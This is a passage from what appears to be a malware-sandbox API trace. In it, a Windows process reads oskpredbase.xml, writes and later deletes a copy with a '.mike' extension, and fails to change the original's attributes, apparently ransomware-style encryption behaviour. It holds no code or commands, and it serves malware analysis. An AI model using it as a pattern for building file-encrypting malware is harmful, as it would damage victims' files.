Shared\\ink\\fsdefinitions\\oskpred", lpFilePart=0x0) returned 0x48 [0046.218] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\", lpFilePart=0x0) returned 0x49 [0046.218] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.218] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.219] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 1 [0046.219] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.219] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.219] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.219] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.219] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0046.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0046.227] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0046.227] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.227] GetFileType (hFile=0x264) returned 0x1 [0046.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0046.227] GetFileType (hFile=0x264) returned 0x1 [0046.227] CloseHandle (hObject=0x264) returned 1 [0046.227] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.228] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.228] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0046.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0046.228] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0046.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.228] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x22aafa8 | out: lpFileInformation=0x22aafa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c)) returned 1 [0046.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.228] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.228] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x22ab310 | out: lpFileInformation=0x22ab310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c)) returned 1 [0046.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.228] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.228] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.228] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.229] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.229] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.229] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.229] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0046.229] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0046.229] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.230] GetFileType (hFile=0x264) returned 0x1 [0046.230] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.230] GetFileType (hFile=0x264) returned 0x1 [0046.230] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0046.230] WriteFile (in: hFile=0x264, lpBuffer=0x22ac388*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22ac388*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0046.231] CloseHandle (hObject=0x264) returned 1 [0046.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0046.231] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x22abe18 | out: lpFileInformation=0x22abe18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c)) returned 1 [0046.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0046.231] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0046.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.231] GetFileType (hFile=0x264) returned 0x1 [0046.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0046.231] GetFileType (hFile=0x264) returned 0x1 [0046.231] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0046.231] ReadFile (in: hFile=0x264, lpBuffer=0x22ad4dc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22ad4dc*, lpNumberOfBytesRead=0x2af038*=0x39c, lpOverlapped=0x0) returned 1 [0046.233] CloseHandle (hObject=0x264) returned 1 [0046.233] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.233] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.233] GetFileType (hFile=0x264) returned 0x1 [0046.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.233] GetFileType (hFile=0x264) returned 0x1 [0046.233] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0046.234] WriteFile (in: hFile=0x264, lpBuffer=0x22b1954*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22b1954*, lpNumberOfBytesWritten=0x2af02c*=0x3a0, lpOverlapped=0x0) returned 1 [0046.234] CloseHandle (hObject=0x264) returned 1 [0046.235] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0046.235] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.235] GetFileType (hFile=0x264) returned 0x1 [0046.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0046.235] GetFileType (hFile=0x264) returned 0x1 [0046.236] WriteFile (in: hFile=0x264, lpBuffer=0x22b4ba8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22b4ba8*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0046.236] CloseHandle (hObject=0x264) returned 1 [0046.236] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.237] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.237] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5c2aa20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5c2aa20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c2aa20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5c0)) returned 1 [0046.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.237] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.237] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.237] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22b642c | out: lpFileInformation=0x22b642c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5c2aa20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5c2aa20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c2aa20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5c0)) returned 1 [0046.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.237] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", dwFileAttributes=0x80) returned 0 [0046.238] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.238] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0046.238] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5c2aa20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5c2aa20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c2aa20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5c0)) returned 1 [0046.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0046.238] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpFilePart=0x0) returned 0x58 [0046.239] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike", lpFilePart=0x0) returned 0x5d [0046.239] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.mike")) returned 1 [0046.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.240] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred", lpFilePart=0x0) returned 0x48 [0046.240] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\", lpFilePart=0x0) returned 0x49 